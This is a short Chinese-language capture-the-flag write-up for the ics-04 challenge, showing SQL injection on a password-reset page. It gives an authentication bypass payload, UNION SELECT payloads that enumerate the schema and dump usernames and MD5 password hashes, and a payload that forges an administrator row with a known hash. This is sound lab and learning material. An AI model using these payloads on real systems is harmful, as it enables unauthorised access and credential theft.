攻防世界ics-04

题目描述：工控云管理系统新添加的登录和注册页面存在漏洞，请找出flag。
考虑是否存在注入漏洞

只有三个地方可以点，登录，注册，忘记密码
先注册


普通用户登录没什么用，估计得管理员登录
登录和注册页面没有注入点，就忘记密码

测试后存在注入，1’or 1=1#绕过

手工测试，后台过滤了一部分，直接union select，
1’ union select 1,2,3,4#

页面回显正常
查询数据库
1’ union select 1,2,group_concat(schema_name),4 from information_schema.schemata#

数据库cetc004
查表名
1’ union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema = ‘cetc004’#

表名user
查列名
1’ union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = ‘user’#
表名username，password
查用户
1’ union select 1,2,group_concat(username),4 from cetc004.user#

查密码
1’ union select 1,2,group_concat(password),4 from cetc004.user#
得到密码，md5加密，试着在线解密，失败

1’ union select ‘c3tlwDmIn23’,‘202cb962ac59075b964b07152d234b70’,‘1’,‘2’#

现在用修改密码，把管理员的密码改了

1’ union select ‘c3tlwDmIn23’,‘202cb962ac59075b964b07152d234b70’,‘1’,‘2’#
其中202cb962ac59075b964b07152d234b70是 123 md5加密后的值。

然后重新管理员登陆，用修改了的密码

得到flag

参考文章：https://www.cnblogs.com/suferma/p/12852430.html

萌新一只，感谢大佬

2020.8.3 公瑾